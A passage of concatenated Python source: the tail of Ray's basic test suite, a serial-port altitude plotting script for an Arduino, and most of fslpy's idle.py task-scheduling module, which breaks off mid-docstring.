print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
error_lines = captured["err"]
assert len(error_lines) == 0
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(num_cpus=1, driver_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID(_random_string()).hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(shutdown_only):
ray.init(num_cpus=1)
node_manager_address = None
node_manager_port = None
for client in ray.global_state.client_table():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b'asdf')
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
|
realtime_altitude.py
|
#!/usr/bin/env python3
'''
Real-time plot demo using serial input from Arduino altitude-estimation sketch
Dependencies: numpy, matplotlib, https://github.com/simondlevy/RealtimePlotter
Copyright (C) 2018 Simon D. Levy
'''
import serial
from realtime_plot import RealtimePlotter
import numpy as np
from threading import Thread
from sys import argv
# Change these to suit your needs
PORT = '/dev/ttyACM0'
BAUD = 115200
BARO_RANGE = 1
ALTITUDE_RANGE = 5
VELOCITY_RANGE = 1
ACCELERATION_RANGE = 5
NTICKS = 10
class SerialPlotter(RealtimePlotter):
def __init__(self):
ranges = [(-lim,+lim) for lim in [BARO_RANGE, ALTITUDE_RANGE, VELOCITY_RANGE, ACCELERATION_RANGE]]
RealtimePlotter.__init__(self,
ranges,
show_yvals=True,
ylabels=['Barometer', 'Altitude', 'Velocity', 'Acceleration'],
yticks=[np.linspace(rng[0], rng[1], NTICKS-1) for rng in ranges],
window_name='Altitude Estimation',
styles=['b', 'r', 'g', 'y'])
self.tick = 0
self.vals = None
def getValues(self):
return self.vals
def _update(port, plotter):
while True:
plotter.vals = [float(s) for s in port.readline().decode()[:-2].split(',')]
plotter.tick += 1
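# Illustrative sketch of the line format that _update above expects from the
# Arduino sketch: comma-separated floats terminated by "\r\n". The sample
# bytes in the comment are made up.
def _parse_line(raw):
    # b'0.01,1.25,-0.30,0.02\r\n' -> [0.01, 1.25, -0.3, 0.02]
    return [float(s) for s in raw.decode()[:-2].split(',')]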
if __name__ == '__main__':
port = argv[1] if len(argv) > 1 else PORT
try:
port = serial.Serial(port, BAUD)
except serial.SerialException:
        print('Unable to open device on port %s' % port)
exit(1)
plotter = SerialPlotter()
thread = Thread(target=_update, args = (port, plotter))
thread.daemon = True
thread.start()
plotter.start()
|
idle.py
|
#!/usr/bin/env python
#
# idle.py - Run functions on an idle loop or in a separate thread.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module provides functions and classes for running tasks
asynchronously, either in an idle loop, or on a separate thread.
.. note:: The :class:`IdleLoop` functionality in this module is intended to be
run from within a ``wx`` application. However, it will still work
without ``wx``, albeit with slightly modified behaviour.
Idle tasks
----------
.. autosummary::
:nosignatures:
IdleLoop
idle
idleWhen
block
The :class:`IdleLoop` class provides a simple way to run a task on an ``wx``
``EVT_IDLE`` event handler. A single ``IdleLoop`` instance is created when
this module is imported; it can be accessed via the :attr:`idleLoop` attribute,
and via the module-level :func:`idle` and :func:`idleWhen` functions.
The :meth:`IdleLoop.idle` method effectively performs the same job as the
:func:`run` function (described below), but is more suitable for short tasks
which do not warrant running in a separate thread.
Thread tasks
------------
.. autosummary::
:nosignatures:
run
wait
TaskThread
The :func:`run` function simply runs a task in a separate thread. This
doesn't seem like a worthy task to have a function of its own, but the
:func:`run` function additionally provides the ability to schedule another
function to run on the ``wx.MainLoop`` when the original function has
completed (via :func:`idle`). This therefore gives us a simple way to run a
computationally intensive task off the main GUI thread (preventing the GUI
from locking up), and to perform some clean up/refresh/notification
afterwards.
The :func:`wait` function is given one or more ``Thread`` instances, and a
task to run. It waits until all the threads have finished, and then runs
the task (via :func:`idle`).
The :class:`TaskThread` class is a simple thread which runs a queue of tasks.
Other facilities
----------------
The ``idle`` module also defines the :func:`mutex` decorator, which is
intended to be used to mark the methods of a class as being mutually exclusive.
The ``mutex`` decorator uses the :class:`MutexFactory` class to do its work.
"""
import time
import atexit
import logging
import functools
import threading
from contextlib import contextmanager
from collections import abc
try: import queue
except ImportError: import Queue as queue
log = logging.getLogger(__name__)
class IdleTask(object):
"""Container object used by the :class:`IdleLoop` class.
Used to encapsulate information about a queued task.
"""
def __init__(self,
name,
task,
schedtime,
after,
timeout,
args,
kwargs):
self.name = name
self.task = task
self.schedtime = schedtime
self.after = after
self.timeout = timeout
self.args = args
self.kwargs = kwargs
class IdleLoop(object):
"""This class contains logic for running tasks via ``wx.EVT_IDLE`` events.
A single ``IdleLoop`` instance is created when this module is first
imported - it is accessed via the module-level :attr:`idleLoop` attribute.
In normal circumstances, this ``idleLoop`` instance should be treated as a
singleton, although this is not enforced in any way.
The ``EVT_IDLE`` event is generated automatically by ``wx`` during periods
of inactivity. However, there are some circumstances in which ``EVT_IDLE``
will not be generated, and pending events may be left on the queue. For
this reason, the ``IdleLoop`` will occasionally use a ``wx.Timer`` to
ensure that it continues to be called. The time-out used by this ``Timer``
can be queried and set via the :meth:`callRate` property.
"""
def __init__(self):
"""Create an ``IdleLoop``.
This method does not do much - the real initialisation takes place
on the first call to :meth:`idle`.
"""
self.__registered = False
self.__queue = queue.Queue()
self.__queueDict = {}
self.__timer = None
self.__callRate = 200
self.__allowErrors = False
self.__neverQueue = False
# Call reset on exit, in case
# the idle.timer is active.
atexit.register(self.reset)
@property
def registered(self):
"""Boolean flag indicating whether a handler has been registered on
``wx.EVT_IDLE`` events. Checked and set in the :meth:`idle` method.
"""
return self.__registered
@property
def queue(self):
"""A ``Queue`` of functions which are to be run on the ``wx.EVT_IDLE``
loop.
"""
return self.__queue
@property
def queueDict(self):
"""A ``dict`` containing the names of all named tasks which are
currently queued on the idle loop (see the ``name`` parameter to the
:meth:`idle` method).
"""
return self.__queueDict
@property
def timer(self):
"""A ``wx.Timer`` instance which is used to periodically trigger the
:func:`_wxIdleLoop` in circumstances where ``wx.EVT_IDLE`` events may
not be generated. This is created in the first call to :meth:`idle`.
"""
return self.__timer
@property
def callRate(self):
"""Minimum time (in milliseconds) between consecutive calls to the idle
loop (:meth:`__idleLoop`). If ``wx.EVT_IDLE`` events are not being
fired, the :meth:`timer` is used to maintain the idle loop at this
rate.
"""
return self.__callRate
@callRate.setter
def callRate(self, rate):
"""Update the :meth:`callRate` to ``rate`` (specified in milliseconds).
If ``rate is None``, it is set to the default of 200 milliseconds.
"""
if rate is None:
rate = 200
log.debug('Idle loop timeout changed to {}'.format(rate))
self.__callRate = rate
@property
def allowErrors(self):
"""Used for testing/debugging. If ``True``, and a function called on
the idle loop raises an error, that error will not be caught, and the
idle loop will stop.
"""
return self.__allowErrors
@allowErrors.setter
def allowErrors(self, allow):
"""Update the ``allowErrors`` flag. """
self.__allowErrors = allow
@property
def neverQueue(self):
"""If ``True``, tasks passed to :meth:`idle` will never be queued, and
        instead will always be executed directly/synchronously. See also the
:meth:`synchronous` context manager.
"""
return self.__neverQueue
@neverQueue.setter
def neverQueue(self, val):
"""Update the ``neverQueue`` flag. """
self.__neverQueue = val
@contextmanager
def synchronous(self):
"""Context manager which can be used to tenporarily set :meth:`neverQueue` to
``True``, restoring its previous value afterwards.
"""
oldval = self.__neverQueue
self.__neverQueue = True
try:
yield
finally:
self.__neverQueue = oldval
def reset(self):
"""Reset the internal idle loop state.
In a normal execution environment, this method will never need to be
called. However, in an execution environment where multiple ``wx.App``
instances are created, run, and destroyed sequentially, this function
will need to be called after each ``wx.App`` has been destroyed.
        Otherwise the ``idle`` function will not work during execution of
subsequent ``wx.App`` instances.
"""
if self.__timer is not None:
self.__timer.Stop()
# If we're atexit, the ref to
# the queue module might have
# been cleared, in which case
# we don't want to create a
# new one.
if self.__queue is not None: newQueue = queue.Queue()
else: newQueue = None
self.__registered = False
self.__queue = newQueue
self.__queueDict = {}
self.__timer = None
self.__callRate = 200
self.__allowErrors = False
self.__neverQueue = False
def inIdle(self, taskName):
"""Returns ``True`` if a task with the given name is queued on the
idle loop (or is currently running), ``False`` otherwise.
"""
return taskName in self.__queueDict
def cancelIdle(self, taskName):
"""If a task with the given ``taskName`` is in the idle queue, it
is cancelled. If the task is already running, it cannot be cancelled.
A ``KeyError`` is raised if no task called ``taskName`` exists.
"""
self.__queueDict[taskName].timeout = -1
def idle(self, task, *args, **kwargs):
"""Run the given task on a ``wx.EVT_IDLE`` event.
:arg task: The task to run.
:arg name: Optional. If provided, must be provided as a keyword
argument. Specifies a name that can be used to
query the state of this task via :meth:`inIdle`.
:arg after: Optional. If provided, must be provided as a keyword
argument. A time, in seconds, which specifies the
amount of time to wait before running this task
after it has been scheduled.
:arg timeout: Optional. If provided, must be provided as a keyword
argument. Specifies a time out, in seconds. If this
amount of time passes before the function gets
scheduled to be called on the idle loop, the
function is not called, and is dropped from the
queue.
:arg dropIfQueued: Optional. If provided, must be provided as a keyword
argument. If ``True``, and a task with the given
                           ``name`` is already enqueued, that function is
dropped from the queue, and the new task is
enqueued. Defaults to ``False``. This argument takes
precedence over the ``skipIfQueued`` argument.
:arg skipIfQueued: Optional. If provided, must be provided as a keyword
argument. If ``True``, and a task with the given
                           ``name`` is already enqueued, (or is running), the
function is not called. Defaults to ``False``.
:arg alwaysQueue: Optional. If provided, must be provided as a keyword
argument. If ``True``, and a ``wx.MainLoop`` is not
running, the task is enqueued anyway, under the
assumption that a ``wx.MainLoop`` will be started in
the future. Note that, if ``wx.App`` has not yet
been created, another call to ``idle`` must be made
after the app has been created for the original task
to be executed. If ``wx`` is not available, this
parameter will be ignored, and the task executed
directly.
All other arguments are passed through to the task function.
If a ``wx.App`` is not running, or :meth:`neverQueue` has been set to
``True``, the ``timeout``, ``name``, ``dropIfQueued``,
``skipIfQueued``, and ``alwaysQueue`` arguments are ignored. Instead,
the call will sleep for ``after`` seconds, and then the ``task`` will
be called directly.
.. note:: If the ``after`` argument is used, there is no guarantee that
the task will be executed in the order that it is scheduled.
This is because, if the required time has not elapsed when
the task is popped from the queue, it will be re-queued.
.. note:: If you schedule multiple tasks with the same ``name``, and
you do not use the ``skipIfQueued`` or ``dropIfQueued``
arguments, all of those tasks will be executed, but you will
only be able to query/cancel the most recently enqueued
task.
.. note:: You will run into difficulties if you schedule a function
that expects/accepts its own keyword arguments called
``name``, ``skipIfQueued``, ``dropIfQueued``, ``after``,
``timeout``, or ``alwaysQueue``.
"""
from fsl.utils.platform import platform as fslplatform
schedtime = time.time()
timeout = kwargs.pop('timeout', 0)
after = kwargs.pop('after', 0)
name = kwargs.pop('name', None)
dropIfQueued = kwargs.pop('dropIfQueued', False)
skipIfQueued = kwargs.pop('skipIfQueued', False)
alwaysQueue = kwargs.pop('alwaysQueue', False)
canHaveGui = fslplatform.canHaveGui
haveGui = fslplatform.haveGui
# If there is no possibility of a
# gui being available in the future
# (determined by canHaveGui), then
# alwaysQueue is ignored.
alwaysQueue = alwaysQueue and canHaveGui
# We don't have wx - run the task
# directly/synchronously.
if self.__neverQueue or not (haveGui or alwaysQueue):
time.sleep(after)
log.debug('Running idle task directly')
task(*args, **kwargs)
return
import wx
app = wx.GetApp()
# Register on the idle event
# if an app is available
#
# n.b. The 'app is not None' test will
# potentially fail in scenarios where
# multiple wx.Apps have been instantiated,
# as it may return a previously created
# app that is no longer active.
if (not self.registered) and (app is not None):
log.debug('Registering async idle loop')
app.Bind(wx.EVT_IDLE, self.__idleLoop)
# We also occasionally use a
# timer to drive the loop, so
# let's register that as well
self.__timer = wx.Timer(app)
self.__timer.Bind(wx.EVT_TIMER, self.__idleLoop)
self.__registered = True
# A task with the specified
# name is already in the queue
if name is not None and self.inIdle(name):
# Drop the old task
# with the same name
if dropIfQueued:
# The cancelIdle function sets the old
# task timeout to -1, so it won't get
# executed. But the task is left in the
# queue, and in the queueDict.
# In the latter, the old task gets
# overwritten with the new task below.
self.cancelIdle(name)
log.debug('Idle task ({}) is already queued - '
'dropping the old task'.format(name))
# Ignore the new task
# with the same name
elif skipIfQueued:
log.debug('Idle task ({}) is already queued '
'- skipping it'.format(name))
return
log.debug('Scheduling idle task ({}) on wx idle '
'loop'.format(getattr(task, '__name__', '<unknown>')))
idleTask = IdleTask(name,
task,
schedtime,
after,
timeout,
args,
kwargs)
self.__queue.put_nowait(idleTask)
if name is not None:
self.__queueDict[name] = idleTask
def idleWhen(self, func, condition, *args, **kwargs):
"""Poll the ``condition`` function periodically, and schedule ``func``
on :meth:`idle` when it returns ``True``.
:arg func: Function to call.
:arg condition: Function which returns ``True`` or ``False``. The
``func`` function is only called when the
``condition`` function returns ``True``.
:arg pollTime: Must be passed as a keyword argument. Time (in seconds)
                       to wait between successive calls to ``condition``. Defaults
to ``0.2``.
"""
pollTime = kwargs.get('pollTime', 0.2)
if not condition():
self.idle(self.idleWhen,
func,
condition,
after=pollTime,
*args,
**dict(kwargs))
else:
kwargs.pop('pollTime', None)
self.idle(func, *args, **kwargs)
def __idleLoop(self, ev):
"""This method is called on ``wx.EVT_IDLE`` events, and occasionally
on ``wx.EVT_TIMER`` events via the :meth:`timer`. If there
is a function on the :meth:`queue`, it is popped and called.
.. note:: The ``wx.EVT_IDLE`` event is only triggered on user
interaction (e.g. mouse movement). This means that a
situation may arise whereby a function is queued via the
:meth:`idle` method, but no ``EVT_IDLE`` event gets
generated. Therefore, the :meth:`timer` object is
occasionally used to call this function as well.
"""
import wx
ev.Skip()
try:
task = self.__queue.get_nowait()
except queue.Empty:
# Make sure that we get called periodically,
# if EVT_IDLE decides to stop firing. If
# self.timer is None, then self.reset has
# probably been called.
if self.__timer is not None:
self.__timer.Start(self.__callRate, wx.TIMER_ONE_SHOT)
return
now = time.time()
elapsed = now - task.schedtime
queueSizeOffset = 0
taskName = task.name
funcName = getattr(task.task, '__name__', '<unknown>')
if taskName is None: taskName = funcName
else: taskName = '{} [{}]'.format(taskName, funcName)
# Has enough time elapsed
# since the task was scheduled?
# If not, re-queue the task.
# If this is the only task on the
# queue, the idle loop will be
# called again after
# callRate millisecs.
if elapsed < task.after:
log.debug('Re-queueing function ({}) on '
'wx idle loop'.format(taskName))
self.__queue.put_nowait(task)
queueSizeOffset = 1
# Has the task timed out?
elif task.timeout == 0 or (elapsed < task.timeout):
log.debug('Running function ({}) on wx '
'idle loop'.format(taskName))
try:
task.task(*task.args, **task.kwargs)
except Exception as e:
log.warning('Idle task {} crashed - {}: {}'.format(
taskName, type(e).__name__, str(e)), exc_info=True)
if self.__allowErrors:
raise e
if task.name is not None:
try: self.__queueDict.pop(task.name)
except KeyError: pass
# More tasks on the queue?
        # Request another event
if self.__queue.qsize() > queueSizeOffset:
ev.RequestMore()
# Otherwise use the idle
# timer to make sure that
# the loop keeps ticking
# over
else:
self.__timer.Start(self.__callRate, wx.TIMER_ONE_SHOT)
idleLoop = IdleLoop()
"""A singleton :class:`IdleLoop` instance, created when this module is
imported.
"""
def idle(*args, **kwargs):
"""Equivalent to calling :meth:`IdleLoop.idle` on the ``idleLoop``
singleton.
"""
idleLoop.idle(*args, **kwargs)
def idleWhen(*args, **kwargs):
"""Equivalent to calling :meth:`IdleLoop.idleWhen` on the ``idleLoop``
singleton.
"""
idleLoop.idleWhen(*args, **kwargs)
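# Hedged usage sketch for the module-level wrappers above; the task name,
# callables, and timings are illustrative only (see IdleLoop.idle for the
# full set of keyword arguments).
def _example_idle_usage():
    def refresh():
        log.debug('refreshing')
    # Schedule refresh on the idle loop; skip it if a task with the same
    # name is already queued, and drop it if it has not run within 5 seconds.
    idle(refresh, name='refresh', skipIfQueued=True, timeout=5)
    # Run refresh once the (illustrative) predicate returns True, polling
    # every 0.5 seconds.
    def ready():
        return True
    idleWhen(refresh, ready, pollTime=0.5)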
def block(secs, delta=0.01, until=None):
"""Blocks for the specified number of seconds, yielding to the main ``wx``
loop.
If ``wx`` is not available, or a ``wx`` application is not running, this
function is equivalent to ``time.sleep(secs)``.
If ``until`` is provided, this function will block until ``until``
returns ``True``, or ``secs`` have elapsed, whichever comes first.
:arg secs: Time in seconds to block
:arg delta: Time in seconds to sleep between successive yields to ``wx``.
:arg until: Function which returns ``True`` or ``False``, and which
                determines when calls to ``block`` will return.
"""
def defaultUntil():
return False
def tick():
if fslplatform.haveGui:
import wx
wx.YieldIfNeeded()
time.sleep(delta)
if until is None:
until = defaultUntil
from fsl.utils.platform import platform as fslplatform
start = time.time()
while (time.time() - start) < secs:
tick()
if until():
break
def run(task, onFinish=None, onError=None, name=None):
"""Run the given ``task`` in a separate thread.
:arg task: The function to run. Must accept no arguments.
:arg onFinish: An optional function to schedule (on the ``wx.MainLoop``,
via :func:`idle`) once the ``task`` has finished.
:arg onError: An optional function to be called (on the ``wx.MainLoop``,
via :func:`idle`) if the ``task`` raises an error. Passed
the ``Exception`` that was raised.
:arg name: An optional name to use for this task in log statements.
:returns: A reference to the ``Thread`` that was created.
.. note:: If a ``wx`` application is not running, the ``task`` and
``onFinish`` functions will simply be called directly, and
the return value will be ``None``.
"""
from fsl.utils.platform import platform as fslplatform
if name is None:
name = getattr(task, '__name__', '<unknown>')
haveWX = fslplatform.haveGui
# Calls the onFinish or onError handler
def callback(cb, *args, **kwargs):
if cb is None:
return
if haveWX: idle(cb, *args, **kwargs)
else: cb( *args, **kwargs)
# Runs the task, and calls
# callback functions as needed.
def wrapper():
try:
task()
log.debug('Task "{}" finished'.format(name))
callback(onFinish)
except Exception as e:
log.warning('Task "{}" crashed'.format(name), exc_info=True)
callback(onError, e)
# If WX, run on a thread
if haveWX:
log.debug('Running task "{}" on thread'.format(name))
thread = threading.Thread(target=wrapper)
thread.start()
return thread
# Otherwise run directly
else:
log.debug('Running task "{}" directly'.format(name))
wrapper()
return None
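# Hedged usage sketch for run() above; the task and callback names are
# illustrative only.
def _example_run_usage():
    def loadData():
        time.sleep(0.1)           # stand-in for a slow, blocking task
    def onLoaded():
        log.debug('data loaded')  # scheduled via idle() when a GUI is running
    def onError(e):
        log.warning('load failed: %s', e)
    return run(loadData, onFinish=onLoaded, onError=onError, name='loadData')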
def wait(threads, task, *args, **kwargs):
"""Creates and starts a new ``Thread`` which waits for all of the ``Thread``
instances to finish (by ``join``ing them), and then runs the given
``task`` via :func:`idle`.
If the ``direct`` parameter is ``True``, or a ``wx.App`` is not running,
this function ``join``s the threads directly instead of creating a new
``Thread`` to do so.
:arg threads: A ``Thread``, or a sequence of ``Thread`` instances to
join. Elements in the sequence may be ``None``.
:arg task: The task to run once all ``threads`` have completed.
:arg wait_direct: Must be passed as a keyword argument. If ``True``, this
function call will ``join`` all of the ``threads``, and
then call the ``task``. Otherwise (the default), this
function will create a new thread to ``join`` the
``threads``, and will return immediately.
All other arguments are passed to the ``task`` function.
.. note:: This function will not support ``task`` functions which expect
a keyword argument called ``wait_direct``.
"""
from fsl.utils.platform import platform as fslplatform
direct = kwargs.pop('wait_direct', False)
if not isinstance(threads, abc.Sequence):
threads = [threads]
haveWX = fslplatform.haveGui
def joinAll():
log.debug('Wait thread joining on all targets')
for t in threads:
if t is not None:
t.join()
log.debug('Wait thread scheduling task on idle loop')
idle(task, *args, **kwargs)
if haveWX and not direct:
thread = threading.Thread(target=joinAll)
thread.start()
return thread
else:
joinAll()
return None
class Task(object):
"""Container object which encapsulates a task that is run by a
:class:`TaskThread`.
"""
def __init__(self, name, func, onFinish, args, kwargs):
self.name = name
self.func = func
self.onFinish = onFinish
self.args = args
self.kwargs = kwargs
self.enabled = True
class TaskThreadVeto(Exception):
"""Task functions which are added to a :class:`TaskThread` may raise
a ``TaskThreadVeto`` error to skip processing of the task's ``onFinish``
handler (if one has been specified). See the :meth:`TaskThread.enqueue`
method for more details.
"""
pass
class TaskThread(threading.Thread):
"""The ``TaskThread`` is a simple thread which runs tasks. Tasks may be
enqueued and dequeued.
"""
def __init__(self, *args, **kwargs):
"""Create a ``TaskThread``. """
threading.Thread.__init__(self, *args, **kwargs)
self.__q = queue.Queue()
self.__enqueued = {}
self.__stop = False
log.debug('New task thread')
def enqueue(self, func, *args, **kwargs):
"""Enqueue a task to be executed.
:arg func: The task function.
:arg taskName: Task name. Must be specified as a keyword
argument. Does not necessarily have to be a string, but
must be hashable. If you wish to use the :meth:`dequeue`
or :meth:`isQueued` methods, you must provide a task
name.
:arg onFinish: An optional function to be called (via :func:`idle`)
                       when the task function has finished. Must be provided as
                       a keyword argument. If the ``func`` raises a
                       :class:`TaskThreadVeto` error, this function will not
be called.
All other arguments are passed through to the task function when it is
executed.
.. note:: If the specified ``taskName`` is not unique (i.e. another
task with the same name may already be enqueued), the
:meth:`isQueued` method will probably return invalid
results.
.. warning:: Make sure that your task function is not expecting keyword
arguments called ``taskName`` or ``onFinish``!
"""
name = kwargs.pop('taskName', None)
onFinish = kwargs.pop('onFinish', None)
log.debug('Enqueueing task: {} [{}]'.format(
name, getattr(func, '__name__', '<unknown>')))
t = Task(name, func, onFinish, args, kwargs)
self.__enqueued[name] = t
self.__q.put(t)
def isQueued(self, name):
"""Returns ``True`` if a task with the given name is enqueued,
``False`` otherwise.
"""
return name in self.__enqueued
def dequeue(self, name):
"""Dequeues a previously enqueued task.
:arg name: The task to dequeue.
"""
task = self.__enqueued.get(name, None)
if task is not None:
log.debug('Dequeueing task: {}'.format(name))
task.enabled = False
def stop(self):
"""Stop the ``TaskThread`` after any currently running task has
completed.
"""
log.debug('Stopping task thread')
self.__stop = True
def waitUntilIdle(self):
"""Causes the calling thread to block until the task queue is empty.
"""
self.__q.join()
def run(self):
"""Run the ``TaskThread``. """
while True:
try:
# Clear ref to previous task if any. This
# is very important, because otherwise, if
# no tasks get posted to the queue, this
# loop will spin on queue.Empty exceptions,
# and the previous Task object will preserve
# a hanging ref to its function/method. Not
# ideal if the ref is to a method of the
# object which created this TaskThread, and
# needs to be GC'd!
task = None
# An example: Without clearing the task
# reference, the following code would
# result in the TaskThread spinning on empty
# forever, and would prevent the Blah
# instance from being GC'd:
#
# class Blah(object):
# def __init__(self):
                # tt = TaskThread()
# tt.enqueue(self.method)
# tt.start()
#
# def method(self):
# pass
#
# b = Blah()
# del b
task = self.__q.get(timeout=1)
except queue.Empty:
continue
# Any other error typically indicates
# that this is a daemon thread, and
# the TaskThread object has been GC'd
except Exception:
break
finally:
if self.__stop:
break
self.__enqueued.pop(task.name, None)
if not task.enabled:
self.__q.task_done()
continue
log.debug('Running task: {} [{}]'.format(
task.name,
getattr(task.func, '__name__', '<unknown>')))
try:
task.func(*task.args, **task.kwargs)
if task.onFinish is not None:
idle(task.onFinish)
log.debug('Task completed: {} [{}]'.format(
task.name,
getattr(task.func, '__name__', '<unknown>')))
# If the task raises a TaskThreadVeto error,
# we just have to skip the onFinish handler
except TaskThreadVeto:
log.debug('Task completed (vetoed onFinish): {} [{}]'.format(
task.name,
getattr(task.func, '__name__', '<unknown>')))
except Exception as e:
log.warning('Task crashed: {} [{}]: {}: {}'.format(
task.name,
getattr(task.func, '__name__', '<unknown>'),
type(e).__name__,
str(e)),
exc_info=True)
finally:
self.__q.task_done()
self.__q = None
self.__enqueued = None
log.debug('Task thread finished')
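# Hedged usage sketch for TaskThread above; the task name and callables are
# illustrative only.
def _example_task_thread_usage():
    tt = TaskThread()
    tt.daemon = True
    tt.start()
    def square(n):
        log.debug('%i squared is %i', n, n * n)
    tt.enqueue(square, 4, taskName='square',
               onFinish=lambda: log.debug('square finished'))
    tt.waitUntilIdle()
    tt.stop()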
def mutex(*args, **kwargs):
"""Decorator for use on methods of a class, which makes the method
call mutually exclusive.
If you define a class which has one or more methods that must only
